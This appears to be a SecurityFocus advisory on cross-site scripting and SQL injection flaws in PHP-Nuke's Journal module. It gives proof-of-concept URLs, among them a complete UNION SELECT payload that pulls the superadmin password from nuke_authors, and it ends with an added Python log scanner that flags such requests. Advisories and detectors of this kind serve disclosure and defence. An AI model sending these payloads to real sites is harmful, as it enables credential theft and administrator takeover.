PHP-Nuke Multiple Vulnerabilities

No exploit is required.

The following proof of concept examples are available:
http://www.example.com/nuke73/modules.php?name=Journal&file=friend&jid=2&yun=[xss code here]
http://www.example.com/nuke73/modules.php?name=Journal&file=friend&jid=2&ye=[xss code here]
http://www.example.com/nuke73/modules.php?name=Journal&file=add&filelist[]=[xss code here]
http://www.example.com/nuke73/modules.php?name=Journal&file=modify&filelist[]=[xss code here]
http://www.example.com/nuke73/modules.php?name=Journal&file=delete&jid=[xss code here]&forwhat=waraxe
http://www.example.com/nuke73/modules.php?name=Journal&file=comment&onwhat=[xss code here]
http://www.example.com/nuke73/modules.php?name=Journal&file=commentsave&rid=[xss code here]

http://www.example.com/nuke73/modules.php?name=Journal&file=commentkill&onwhat=1
http://www.example.com/nuke73/modules.php?name=Journal&file=savenew&title=f00bar

http://www.example.com/nuke73/modules.php?name=Journal&file=search&bywhat=aid&exact=1&forwhat=kala'/**/UNION/**/SELECT/**/0,0,pwd,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*
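For triage, the following added example (not part of the original advisory) scans web server access logs for requests to the Journal module that carry markup or SQL tokens in the parameters the proof-of-concept URLs above mark as injectable. The log format, the sample lines and the two regular-expression heuristics are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Journal parameters that the proof-of-concept URLs mark as injectable,
# keyed by the value of the "file" parameter.
WATCHED = {
    "friend": {"yun", "ye"},
    "add": {"filelist[]"}, "modify": {"filelist[]"},
    "delete": {"jid"}, "comment": {"onwhat"},
    "commentsave": {"rid"}, "search": {"forwhat"},
}
# Heuristics (assumptions, tune for real traffic): markup characters and SQL tokens.
MARKUP = re.compile(r"[<>\"']")
SQLI = re.compile(r"/\*|\bunion\b.*\bselect\b", re.I | re.S)
# Assumed log layout: common log format with the request line in double quotes.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines, for illustration only.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2004:10:00:00 +0000] "GET /nuke73/modules.php?name=Journal&file=friend&jid=2&yun=%3Cb%3Ex%3C%2Fb%3E HTTP/1.0" 200 512',
    '192.0.2.11 - - [01/Jan/2004:10:00:05 +0000] "GET /nuke73/modules.php?name=Journal&file=search&bywhat=aid&exact=1&forwhat=x%27%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F1 HTTP/1.0" 200 512',
    '192.0.2.12 - - [01/Jan/2004:10:00:09 +0000] "GET /nuke73/modules.php?name=Journal&file=search&bywhat=aid&forwhat=holiday HTTP/1.0" 200 512',
]

def inspect_request(url):
    """Return (parameter, reason) findings for one request URL."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)  # percent-decodes
    if query.get("name", [""])[0].lower() != "journal":
        return []
    findings = []
    for file_value in query.get("file", []):
        for param in sorted(WATCHED.get(file_value.lower(), ())):
            for value in query.get(param, []):
                if SQLI.search(value):
                    findings.append((param, "sql"))
                elif MARKUP.search(value):
                    findings.append((param, "markup"))
    return findings

def scan_log(lines):
    """Return (line number, parameter, reason) for every suspicious request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            hits.extend((number, *f) for f in inspect_request(match.group(1)))
    return hits

if __name__ == "__main__":
    print(scan_log(SAMPLE_LOG))
```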


 

Copyright 2010, SecurityFocus